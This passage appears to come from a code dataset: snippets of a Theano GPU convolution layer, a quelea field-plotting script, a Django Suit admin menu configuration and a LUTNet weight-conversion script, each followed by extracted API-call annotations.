return [self.b] if self.b is not None else []
def get_output_shape_for(self, input_shape):
batch_size = input_shape[0]
input_width, input_height = input_shape[2:4]
output_width = (input_width + 2*self.pad[0] - self.filter_size[0]) // self.strides[0] + 1
output_height = (input_height + 2*self.pad[1] - self.filter_size[1]) // self.strides[1] + 1
return (batch_size, self.num_filters, output_width, output_height)
def get_output_for(self, input, *args, **kwargs):
filters = self.W
if self.flip_filters:
filters = filters[:, :, ::-1, ::-1] # flip width, height
contiguous_filters = gpu_contiguous(filters)
contiguous_input = gpu_contiguous(input)
conved = self.corr_mm_op(contiguous_input, contiguous_filters)
if self.b is None:
activation = conved
elif self.untie_biases:
activation = conved + self.b.dimshuffle('x', 0, 1, 2)
else:
activation = conved + self.b.dimshuffle('x', 0, 'x', 'x')
return self.nonlinearity(activation)
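# Illustrative usage sketch (hypothetical names, assuming an `input_layer` whose
# output shape is (batch, channels, width, height) as elsewhere in this framework):
#
#   conv = Conv2DMMLayer(input_layer, num_filters=32, filter_size=(3, 3),
#                        border_mode='same', flip_filters=True)
#   output_expr = conv.get_output_for(input_expr)
#
# With flip_filters=True the kernels are flipped before GpuCorrMM is applied,
# so the underlying correlation behaves as a true convolution.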
| [
"theano.sandbox.cuda.basic_ops.gpu_contiguous",
"theano.sandbox.cuda.blas.GpuCorrMM"
] | [((2405, 2452), 'theano.sandbox.cuda.blas.GpuCorrMM', 'GpuCorrMM', ([], {'subsample': 'self.strides', 'pad': 'self.pad'}), '(subsample=self.strides, pad=self.pad)\n', (2414, 2452), False, 'from theano.sandbox.cuda.blas import GpuCorrMM\n'), ((3436, 3459), 'theano.sandbox.cuda.basic_ops.gpu_contiguous', 'gpu_contiguous', (['filters'], {}), '(filters)\n', (3450, 3459), False, 'from theano.sandbox.cuda.basic_ops import gpu_contiguous\n'), ((3487, 3508), 'theano.sandbox.cuda.basic_ops.gpu_contiguous', 'gpu_contiguous', (['input'], {}), '(input)\n', (3501, 3508), False, 'from theano.sandbox.cuda.basic_ops import gpu_contiguous\n')] |
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import sys
sys.path.append("../")
from quelea import *
nx = 217
ny = 133
x0 = 0
x1 = 30 # lambdas
y0 = 0
y1 = 20 # lambdas
xs = np.linspace(x0, x1, nx)
ys = np.linspace(y0, y1, ny)
# 2d array of (x, y, z, t)
coords = np.array( [ [x, y, 0, 0] for x in xs for y in ys ] )
# for map_fields function this should be converted from 2D to 1D array
coords = coords.reshape((4 * nx * ny,))
ftype = 1 # plane wave
a0 = 1 # normalized field amplitude
omega = 1 # frequency
fparam = [a0, 1, 0, 0, 0, 1, 0, 0, omega] # parameters of the plane wave
ex, ey, ez, bx, by, bz = map_fields(coords, ftype, fparam)
# now convert to 2d arrays
ex = ex.reshape((nx, ny))
ey = ey.reshape((nx, ny))
ez = ez.reshape((nx, ny))
bx = bx.reshape((nx, ny))
by = by.reshape((nx, ny))
bz = bz.reshape((nx, ny))
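# transpose so that y varies along rows and x along columns, matching imshow's
# (row, column) layout for the extent used below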
ex = ex.transpose()
ey = ey.transpose()
ez = ez.transpose()
bx = bx.transpose()
by = by.transpose()
bz = bz.transpose()
plt.imshow(ey, cmap = 'RdYlBu', origin = 'lower', extent = [x0, x1, y0, y1])
plt.colorbar()
plt.clim(-a0, a0)
plt.savefig("map_fields.pdf")
| [
"matplotlib.pyplot.imshow",
"matplotlib.pyplot.clim",
"matplotlib.pyplot.savefig",
"matplotlib.pyplot.colorbar",
"numpy.array",
"numpy.linspace",
"sys.path.append"
] | [((81, 103), 'sys.path.append', 'sys.path.append', (['"""../"""'], {}), "('../')\n", (96, 103), False, 'import sys\n'), ((201, 224), 'numpy.linspace', 'np.linspace', (['x0', 'x1', 'nx'], {}), '(x0, x1, nx)\n', (212, 224), True, 'import numpy as np\n'), ((230, 253), 'numpy.linspace', 'np.linspace', (['y0', 'y1', 'ny'], {}), '(y0, y1, ny)\n', (241, 253), True, 'import numpy as np\n'), ((291, 339), 'numpy.array', 'np.array', (['[[x, y, 0, 0] for x in xs for y in ys]'], {}), '([[x, y, 0, 0] for x in xs for y in ys])\n', (299, 339), True, 'import numpy as np\n'), ((974, 1044), 'matplotlib.pyplot.imshow', 'plt.imshow', (['ey'], {'cmap': '"""RdYlBu"""', 'origin': '"""lower"""', 'extent': '[x0, x1, y0, y1]'}), "(ey, cmap='RdYlBu', origin='lower', extent=[x0, x1, y0, y1])\n", (984, 1044), True, 'import matplotlib.pyplot as plt\n'), ((1051, 1065), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (1063, 1065), True, 'import matplotlib.pyplot as plt\n'), ((1066, 1083), 'matplotlib.pyplot.clim', 'plt.clim', (['(-a0)', 'a0'], {}), '(-a0, a0)\n', (1074, 1083), True, 'import matplotlib.pyplot as plt\n'), ((1085, 1114), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""map_fields.pdf"""'], {}), "('map_fields.pdf')\n", (1096, 1114), True, 'import matplotlib.pyplot as plt\n')] |
from django.conf import settings
from suit import apps
from suit.apps import DjangoSuitConfig
from suit.menu import ParentItem, ChildItem
APP_NAME = settings.APP_NAME
WIKI_URL = settings.WIKI_URL
class SuitConfig(DjangoSuitConfig):
name = 'suit'
verbose_name = 'Mbiome Core JAXid Generator'
site_title = 'Mbiome Core JAXid Tracking'
site_header = site_title
index_title = verbose_name
layout = 'vertical'
list_per_page = 35
# header_date_format = 'l, d-M-o'
# header_time_format = 'H:i e'
menu = (
ParentItem('JAX Id Record Lists',
use_first_child_url=True,
url='',
children=[
ChildItem('JAXid Records', model='id_generate.jaxiddetail'),
ChildItem(model='id_generate.boxid'),
ChildItem(model='id_generate.plateid'),
],
icon='fa fa-list-ul'),
ParentItem('Reference Data',
use_first_child_url=True,
url='',
children=[
ChildItem(model='id_generate.projectcode'),
ChildItem(model='id_generate.nucleicacidtype'),
ChildItem(model='id_generate.sampletype'),
ChildItem(model='id_generate.sequencingtype'),
],
icon='fa fa-list'),
ParentItem(
label='Generate new JAXid''s',
url=f'/{APP_NAME}/manage/id_generate/jaxiddetail/import/',
permissions='id_generate.change_jaxiddetail',
icon='fa fa-rocket'),
ParentItem(
label='Generate new Box ID''s',
url=f'/{APP_NAME}/manage/id_generate/boxid/import/',
permissions='id_generate.change_boxid',
icon='fa fa-cube'),
ParentItem(
label='Generate new Plate ID''s',
url=f'/{APP_NAME}/manage/id_generate/plateid/import/',
permissions='id_generate.change_plateid',
icon='fa fa-circle-o-notch'),
ParentItem(
label='Authorization',
children=[
ChildItem('Staff', model='auth.user'),
ChildItem(model='auth.group'),
ChildItem(model='admin.logentry'),
],
icon='fa fa-user-circle'),
ParentItem(
label='SOP and Request Sheet',
use_first_child_url=False,
url='',
children=[
ChildItem('View JAX ID Request SOP',
target_blank=True,
url=f'{WIKI_URL}/Wet%20Lab%20SOPs/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FWet%20Lab%20SOPs%2FJAX%20ID%20Request%20SOP%2Edocx'),
ChildItem('View JAX ID Request Template Sheet',
url=f'{WIKI_URL}/Sample Sheet Templates/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FSample Sheet Templates%2FJAX ID Request Template Sample Sheet.xlsx'),
],
icon='fa fa-file'),
)
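    # Each ParentItem above groups its ChildItem entries into one sidebar section;
    # with use_first_child_url=True the parent entry appears to link directly to
    # its first child's URL instead of needing a URL of its own.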
# menu_handler = None
menu_show_home = False
# Show changelist top actions only if any row is selected
toggle_changelist_top_actions = False
# # Enables two column layout for change forms with submit row on the right
form_submit_on_right = False
# Hide name/"original" column for all tabular inlines.
# May be overridden in Inline class by suit_form_inlines_hide_original = False
#form_inlines_hide_original = False
form_size = {
'default': apps.SUIT_FORM_SIZE_LARGE,
'widgets': {
'AutosizedTextarea': apps.SUIT_FORM_SIZE_X_LARGE,
'Textarea': apps.SUIT_FORM_SIZE_X_LARGE,
},
}
# form_size setting can be overridden in ModelAdmin using suit_form_size parameter
#
# Example:
# ----------------------------------------------
# suit_form_size = {
# 'default': 'col-xs-12 col-sm-2', 'col-xs-12 col-sm-10',
# 'fields': {
# 'field_name': SUIT_FORM_SIZE_LARGE,
# 'field_name2': SUIT_FORM_SIZE_X_LARGE,
# },
# 'widgets': {
# 'widget_class_name': SUIT_FORM_SIZE_FULL,
# 'AdminTextareaWidget': SUIT_FORM_SIZE_FULL,
# },
# 'fieldsets': {
# 'fieldset_name': SUIT_FORM_SIZE_FULL,
# 'fieldset_name2': SUIT_FORM_SIZE_FULL,
# }
# }
| [
"suit.menu.ChildItem",
"suit.menu.ParentItem"
] | [((1411, 1586), 'suit.menu.ParentItem', 'ParentItem', ([], {'label': '"""Generate new JAXids"""', 'url': 'f"""/{APP_NAME}/manage/id_generate/jaxiddetail/import/"""', 'permissions': '"""id_generate.change_jaxiddetail"""', 'icon': '"""fa fa-rocket"""'}), "(label='Generate new JAXids', url=\n f'/{APP_NAME}/manage/id_generate/jaxiddetail/import/', permissions=\n 'id_generate.change_jaxiddetail', icon='fa fa-rocket')\n", (1421, 1586), False, 'from suit.menu import ParentItem, ChildItem\n'), ((1657, 1819), 'suit.menu.ParentItem', 'ParentItem', ([], {'label': '"""Generate new Box IDs"""', 'url': 'f"""/{APP_NAME}/manage/id_generate/boxid/import/"""', 'permissions': '"""id_generate.change_boxid"""', 'icon': '"""fa fa-cube"""'}), "(label='Generate new Box IDs', url=\n f'/{APP_NAME}/manage/id_generate/boxid/import/', permissions=\n 'id_generate.change_boxid', icon='fa fa-cube')\n", (1667, 1819), False, 'from suit.menu import ParentItem, ChildItem\n'), ((1890, 2068), 'suit.menu.ParentItem', 'ParentItem', ([], {'label': '"""Generate new Plate IDs"""', 'url': 'f"""/{APP_NAME}/manage/id_generate/plateid/import/"""', 'permissions': '"""id_generate.change_plateid"""', 'icon': '"""fa fa-circle-o-notch"""'}), "(label='Generate new Plate IDs', url=\n f'/{APP_NAME}/manage/id_generate/plateid/import/', permissions=\n 'id_generate.change_plateid', icon='fa fa-circle-o-notch')\n", (1900, 2068), False, 'from suit.menu import ParentItem, ChildItem\n'), ((703, 762), 'suit.menu.ChildItem', 'ChildItem', (['"""JAXid Records"""'], {'model': '"""id_generate.jaxiddetail"""'}), "('JAXid Records', model='id_generate.jaxiddetail')\n", (712, 762), False, 'from suit.menu import ParentItem, ChildItem\n'), ((784, 820), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""id_generate.boxid"""'}), "(model='id_generate.boxid')\n", (793, 820), False, 'from suit.menu import ParentItem, ChildItem\n'), ((842, 880), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""id_generate.plateid"""'}), "(model='id_generate.plateid')\n", (851, 880), False, 'from suit.menu import ParentItem, ChildItem\n'), ((1098, 1140), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""id_generate.projectcode"""'}), "(model='id_generate.projectcode')\n", (1107, 1140), False, 'from suit.menu import ParentItem, ChildItem\n'), ((1162, 1208), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""id_generate.nucleicacidtype"""'}), "(model='id_generate.nucleicacidtype')\n", (1171, 1208), False, 'from suit.menu import ParentItem, ChildItem\n'), ((1230, 1271), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""id_generate.sampletype"""'}), "(model='id_generate.sampletype')\n", (1239, 1271), False, 'from suit.menu import ParentItem, ChildItem\n'), ((1293, 1338), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""id_generate.sequencingtype"""'}), "(model='id_generate.sequencingtype')\n", (1302, 1338), False, 'from suit.menu import ParentItem, ChildItem\n'), ((2237, 2274), 'suit.menu.ChildItem', 'ChildItem', (['"""Staff"""'], {'model': '"""auth.user"""'}), "('Staff', model='auth.user')\n", (2246, 2274), False, 'from suit.menu import ParentItem, ChildItem\n'), ((2296, 2325), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""auth.group"""'}), "(model='auth.group')\n", (2305, 2325), False, 'from suit.menu import ParentItem, ChildItem\n'), ((2347, 2380), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '"""admin.logentry"""'}), "(model='admin.logentry')\n", (2356, 2380), False, 'from suit.menu import ParentItem, ChildItem\n'), ((2634, 2845), 
'suit.menu.ChildItem', 'ChildItem', (['"""View JAX ID Request SOP"""'], {'target_blank': '(True)', 'url': 'f"""{WIKI_URL}/Wet%20Lab%20SOPs/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FWet%20Lab%20SOPs%2FJAX%20ID%20Request%20SOP%2Edocx"""'}), "('View JAX ID Request SOP', target_blank=True, url=\n f'{WIKI_URL}/Wet%20Lab%20SOPs/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FWet%20Lab%20SOPs%2FJAX%20ID%20Request%20SOP%2Edocx'\n )\n", (2643, 2845), False, 'from suit.menu import ParentItem, ChildItem\n'), ((2917, 3142), 'suit.menu.ChildItem', 'ChildItem', (['"""View JAX ID Request Template Sheet"""'], {'url': 'f"""{WIKI_URL}/Sample Sheet Templates/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FSample Sheet Templates%2FJAX ID Request Template Sample Sheet.xlsx"""'}), "('View JAX ID Request Template Sheet', url=\n f'{WIKI_URL}/Sample Sheet Templates/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FSample Sheet Templates%2FJAX ID Request Template Sample Sheet.xlsx'\n )\n", (2926, 3142), False, 'from suit.menu import ParentItem, ChildItem\n')] |
import h5py
import numpy as np
np.set_printoptions(threshold=np.inf) # print arrays in full; np.nan is rejected as a threshold by newer NumPy
from shutil import copyfile
copyfile("dummy_lutnet.h5", "pretrained_bin.h5") # create pretrained_bin.h5 using the datastructure from dummy_lutnet.h5
bl = h5py.File("baseline_pruned.h5", 'r')
#dummy = h5py.File("dummy.h5", 'r')
pretrained = h5py.File("pretrained_bin.h5", 'r+')
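# Overall flow: the copied dummy LUTNet file supplies the full LUTNet datastructure,
# and the trained pruned baseline ("baseline_pruned.h5") is read layer by layer so
# its weights, gamma, means and pruning masks can be written into the matching
# datasets of "pretrained_bin.h5".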
# dense layer 1
bl_w1 = bl["model_weights"]["binary_dense_1"]["binary_dense_1"]["Variable_1:0"]
bl_pruning_mask = bl["model_weights"]["binary_dense_1"]["binary_dense_1"]["pruning_mask:0"]
bl_gamma = bl["model_weights"]["binary_dense_1"]["binary_dense_1"]["Variable:0"]
zero_fill = np.zeros(np.shape(np.array(bl_w1)))
pret_w1 = pretrained["model_weights"]["binary_dense_1"]["binary_dense_1"]["Variable_1:0"]
pret_pruning_mask = pretrained["model_weights"]["binary_dense_1"]["binary_dense_1"]["pruning_mask:0"]
p_gamma = pretrained["model_weights"]["binary_dense_1"]["binary_dense_1"]["Variable:0"]
pret_w1[...] = np.array(bl_w1)
p_gamma[...] = np.array(bl_gamma)
pret_pruning_mask[...] = np.array(bl_pruning_mask)
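# report, for this layer, the number of nonzero entries in the pruning mask versus its total size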
print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask))))
# dense layer 2
bl_w1 = bl["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_1:0"]
bl_rand_map_0 = bl["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_0:0"]
bl_pruning_mask = bl["model_weights"]["binary_dense_2"]["binary_dense_2"]["pruning_mask:0"]
bl_gamma = bl["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable:0"]
bl_means = bl["model_weights"]["residual_sign_1"]["residual_sign_1"]["means:0"]
pret_rand_map_0 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_0:0"]
pret_rand_map_1 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_1:0"]
pret_rand_map_2 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_2:0"]
pret_pruning_mask = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["pruning_mask:0"]
p_gamma = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable:0"]
pret_means = pretrained["model_weights"]["residual_sign_1"]["residual_sign_1"]["means:0"]
pret_c1 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_1:0"]
pret_c2 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_2:0"]
pret_c3 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_3:0"]
pret_c4 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_4:0"]
pret_c5 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_5:0"]
pret_c6 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_6:0"]
pret_c7 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_7:0"]
pret_c8 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_8:0"]
pret_c9 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_9:0"]
pret_c10= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_10:0"]
pret_c11= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_11:0"]
pret_c12= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_12:0"]
pret_c13= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_13:0"]
pret_c14= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_14:0"]
pret_c15= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_15:0"]
pret_c16= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_16:0"]
pret_c17= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_17:0"]
pret_c18= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_18:0"]
pret_c19= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_19:0"]
pret_c20= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_20:0"]
pret_c21= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_21:0"]
pret_c22= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_22:0"]
pret_c23= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_23:0"]
pret_c24= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_24:0"]
pret_c25= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_25:0"]
pret_c26= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_26:0"]
pret_c27= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_27:0"]
pret_c28= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_28:0"]
pret_c29= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_29:0"]
pret_c30= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_30:0"]
pret_c31= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_31:0"]
pret_c32= pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_32:0"]
pret_w1 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["Variable_33:0"]
pret_rand_map_exp_0 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_exp_0:0"]
pret_rand_map_exp_1 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_exp_1:0"]
pret_rand_map_exp_2 = pretrained["model_weights"]["binary_dense_2"]["binary_dense_2"]["rand_map_exp_2:0"]
weight_shape = np.shape(bl_w1)
tile_shape = np.shape(pret_c1)
zero_fill = np.zeros(tile_shape)
one_fill = np.ones(tile_shape)
neg_one_fill = -np.ones(tile_shape)
# randomisation and pruning recovery
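# Draw three independent random permutations over the positions of one weight tile;
# these act as the randomised input connections of the LUT-based layer. The mask
# manipulation below ("pruning recovery") ORs extra entries back into the pruning
# mask according to where the permutation lands relative to the original mask.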
bl_w1_unroll = np.array(bl_w1)
bl_w1 = np.array(bl_w1)
rand_map_0 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_0)
rand_map_1 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_1)
rand_map_2 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_2)
pruning_mask = np.array(bl_pruning_mask).astype(bool)
init_mask = np.logical_not(pruning_mask[rand_map_0])
pruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)]
pruning_mask = np.logical_or(pruning_mask, pruning_mask_recover)
init_mask = np.reshape(init_mask, tile_shape)
# expand randomisation map across tiles
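# Each tile reuses the same per-tile permutation, offset into that tile's own index
# range, so the expanded maps index directly into the unrolled weight vector.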
rand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]//tile_shape[0]])
rand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]//tile_shape[0]])
rand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]//tile_shape[0]])
for i in range(weight_shape[0]):
    rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]//tile_shape[0]-1)) * (rand_map_0_expand[i]//tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]//tile_shape[0])
    rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]//tile_shape[0]-1)) * (rand_map_1_expand[i]//tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]//tile_shape[0])
    rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]//tile_shape[0]-1)) * (rand_map_2_expand[i]//tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]//tile_shape[0])
bl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand]
bl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape)
w1 = bl_w1
# connect1 only
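# "connect1 only": the 32 per-tile LUT coefficients are filled with a fixed
# alternating +1/-1 pattern, which (per the comment above) leaves only the first
# LUT input connection effective at the start of retraining.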
c1 = one_fill
c2 = neg_one_fill
c3 = one_fill
c4 = neg_one_fill
c5 = one_fill
c6 = neg_one_fill
c7 = one_fill
c8 = neg_one_fill
c9 = one_fill
c10 = neg_one_fill
c11 = one_fill
c12 = neg_one_fill
c13 = one_fill
c14 = neg_one_fill
c15 = one_fill
c16 = neg_one_fill
c17 = neg_one_fill
c18 = one_fill
c19 = neg_one_fill
c20 = one_fill
c21 = neg_one_fill
c22 = one_fill
c23 = neg_one_fill
c24 = one_fill
c25 = neg_one_fill
c26 = one_fill
c27 = neg_one_fill
c28 = one_fill
c29 = neg_one_fill
c30 = one_fill
c31 = neg_one_fill
c32 = one_fill
pret_w1 [...] = w1
pret_c1 [...] = c1
pret_c2 [...] = c2
pret_c3 [...] = c3
pret_c4 [...] = c4
pret_c5 [...] = c5
pret_c6 [...] = c6
pret_c7 [...] = c7
pret_c8 [...] = c8
pret_c9 [...] = c9
pret_c10[...] = c10
pret_c11[...] = c11
pret_c12[...] = c12
pret_c13[...] = c13
pret_c14[...] = c14
pret_c15[...] = c15
pret_c16[...] = c16
pret_c17[...] = c17
pret_c18[...] = c18
pret_c19[...] = c19
pret_c20[...] = c20
pret_c21[...] = c21
pret_c22[...] = c22
pret_c23[...] = c23
pret_c24[...] = c24
pret_c25[...] = c25
pret_c26[...] = c26
pret_c27[...] = c27
pret_c28[...] = c28
pret_c29[...] = c29
pret_c30[...] = c30
pret_c31[...] = c31
pret_c32[...] = c32
pret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float)
pret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float)
pret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float)
p_gamma[...] = np.array(bl_gamma)
pret_means[...] = np.array(bl_means)
pret_pruning_mask[...] = np.array(bl_pruning_mask)
rand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float)
pret_rand_map_exp_0[...] = rand_map_0_expand
rand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float)
pret_rand_map_exp_1[...] = rand_map_1_expand
rand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float)
pret_rand_map_exp_2[...] = rand_map_2_expand
print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask))))
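# The following dense layers repeat the identical procedure: copy baseline weights,
# draw fresh random maps, recover the pruning mask, and initialise the LUT
# coefficients with the same alternating pattern.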
# dense layer 3
bl_w1 = bl["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_1:0"]
bl_rand_map_0 = bl["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_0:0"]
bl_pruning_mask = bl["model_weights"]["binary_dense_3"]["binary_dense_3"]["pruning_mask:0"]
bl_gamma = bl["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable:0"]
bl_means = bl["model_weights"]["residual_sign_2"]["residual_sign_2"]["means:0"]
pret_rand_map_0 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_0:0"]
pret_rand_map_1 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_1:0"]
pret_rand_map_2 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_2:0"]
pret_pruning_mask = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["pruning_mask:0"]
p_gamma = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable:0"]
pret_means = pretrained["model_weights"]["residual_sign_2"]["residual_sign_2"]["means:0"]
pret_c1 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_1:0"]
pret_c2 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_2:0"]
pret_c3 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_3:0"]
pret_c4 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_4:0"]
pret_c5 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_5:0"]
pret_c6 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_6:0"]
pret_c7 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_7:0"]
pret_c8 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_8:0"]
pret_c9 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_9:0"]
pret_c10= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_10:0"]
pret_c11= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_11:0"]
pret_c12= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_12:0"]
pret_c13= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_13:0"]
pret_c14= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_14:0"]
pret_c15= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_15:0"]
pret_c16= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_16:0"]
pret_c17= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_17:0"]
pret_c18= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_18:0"]
pret_c19= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_19:0"]
pret_c20= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_20:0"]
pret_c21= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_21:0"]
pret_c22= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_22:0"]
pret_c23= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_23:0"]
pret_c24= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_24:0"]
pret_c25= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_25:0"]
pret_c26= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_26:0"]
pret_c27= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_27:0"]
pret_c28= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_28:0"]
pret_c29= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_29:0"]
pret_c30= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_30:0"]
pret_c31= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_31:0"]
pret_c32= pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_32:0"]
pret_w1 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["Variable_33:0"]
pret_rand_map_exp_0 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_exp_0:0"]
pret_rand_map_exp_1 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_exp_1:0"]
pret_rand_map_exp_2 = pretrained["model_weights"]["binary_dense_3"]["binary_dense_3"]["rand_map_exp_2:0"]
weight_shape = np.shape(bl_w1)
tile_shape = np.shape(pret_c1)
zero_fill = np.zeros(tile_shape)
one_fill = np.ones(tile_shape)
neg_one_fill = -np.ones(tile_shape)
# randomisation and pruning recovery
bl_w1_unroll = np.array(bl_w1)
bl_w1 = np.array(bl_w1)
rand_map_0 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_0)
rand_map_1 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_1)
